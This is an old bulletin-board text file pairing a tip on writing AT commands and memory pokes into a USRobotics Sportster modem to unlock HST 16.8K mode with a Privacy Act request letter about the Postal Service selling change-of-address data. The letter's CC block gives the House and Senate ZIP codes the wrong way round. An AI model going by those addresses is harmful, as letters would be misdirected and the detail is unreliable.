- If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
- the following commands to it to turn it into an HST 16.8K dual standard.
- In effect, you add HST 16.8K to its V32.bis 14.4k capability.
-
- ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
- atgw03c6,22gw05cd,2f
- ats14=1s24=150s26=1s32=8s34=0x7&w
-
- A very important item is the b1, which tells the modem to use
- the 16.8K HST protocol. If you do not set b1, when the Sportster
- connects with another V32 modem it will go through the CCITT v.32
- connect tones and you will not get a 16.8K connect.
-
- If you do get an HST connect, you will not hear the "normal"
- train phase--instead you will hear the HST negotiation which
- sounds like a 2400 baud carrier.
-
- Finally, if you change the "cd" in the second line to a "cb", your
- modem will think it is a V.32 Courier instead of an HST 16.8K.
-
- Look for other pfine pfiles from Rancid Bacon Productions in conjunction
- with USDA Grade A Hackers (UGAH.) Accept no substitutes.
-
- *******************************************************************************
-
- Request to Post Office on Selling of Personal Information
-
- In May 1992, the US Postal Service testified before the US House of
- Representatives' Government Operations Subcommittee that National Change of
- Address (NCOA) information filled out by each postal patron who moves and
- files that move with the Post Office to have their mail forwarded is sold to
- direct marketing firms without the person's consent and without informing
- them of the disclosure. These records are then used to target people who
- have recently moved and by private detective agencies to trace people, among
- other uses. There is no way, except by not filling out the NCOA form, to
- prevent this disclosure.
-
- This letter is to request information on why your personal information
- was disclosed and what uses are being made of it. Patrons who send in this
- letter are encouraged to also forward it and any replies to their
- Congressional Representative and Senators.
-
-
- Eligible requestors: Anyone who has filed a change of address notice with
- the Postal Service within the last five years.
-
-
-
- Records Officer
- US Postal Service
- Washington, DC 20260 PRIVACY ACT REQUEST
-
-
- Dear Sir/Madam:
-
- This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
- requires the Postal Service, as a government agency, to maintain an
- accounting of the date, nature, and purpose of each disclosure of
- information about individuals. I request a copy of the accounting of all
- disclosures made of address change and mail forwarding information that I provided
- to the Postal Service. This information is maintained in USPS System of
- Records 010.010.
-
- On or about (date), I filed a change of address notice requesting that my
- mail be forwarded from (old address) to (new address). The name that I used
- on the change of address form was (name).
-
- This request includes the accounting of all disclosures made by the Postal
- Service, its contractors, and its licensees.
-
- I am making this request because I object to the Postal Service's policy of
- disclosing this information without giving individuals an option to prevent
- release of this information. I want to learn how my information has been
- disclosed and what uses have been made of it. Please let the Postmaster
- General know that postal patrons want to have a choice in how change of
- address information is used.
-
- If there is a fee in excess of $5 for this information, please notify me in
- advance. Thank you for consideration of this request.
-
-
- Sincerely,
-
-
-
- CC: Your Congressional Representative
- US House of Representatives
- Washington, DC 20510
-
- Your Senators
- US Senate
- Washington, DC 20515
-
- -------------------------------------------------------------------------------
-
-